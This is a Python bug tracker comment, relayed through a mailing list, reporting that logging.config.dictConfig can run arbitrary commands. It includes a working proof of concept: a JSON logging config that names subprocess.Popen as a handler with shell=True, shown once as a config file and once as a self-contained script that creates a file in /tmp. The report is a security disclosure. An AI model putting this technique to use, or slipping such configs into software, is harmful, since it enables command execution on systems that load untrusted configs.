MarkBaggett <lo127...@gmail.com> added the comment:
Let me also mention that the problem really includes anything that uses the resolve() functions. Here is a working example that puts an exploit in a HANDLER rather than a FORMATTER. $ ls /tmp/alsoworked ls: cannot access '/tmp/alsoworked': No such file or directory $ python calculator.py $ ls /tmp/alsoworked /tmp/alsoworked $ cat log.config { "version":1, "root":{ "handlers" : ["EXPLOIT"] }, "handlers":{ "EXPLOIT":{ "class": "subprocess.Popen", "args" : "touch /tmp/alsoworked", "shell" : "True" } } } Or if you prefer it in one file.. ----------------------------- import logging.config import json log_config_txt = '''{ "version":1, "root":{ "handlers" : ["EXPLOIT"] }, "handlers":{ "EXPLOIT":{ "class": "subprocess.Popen", "args" : "touch /tmp/alsoworks", "shell" : "True" } } } ''' log_config = json.loads(log_config_txt) logging.config.dictConfig(log_config) ------------------------ ---------- _______________________________________ Python tracker <rep...@bugs.python.org> <https://bugs.python.org/issue46251> _______________________________________ _______________________________________________ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com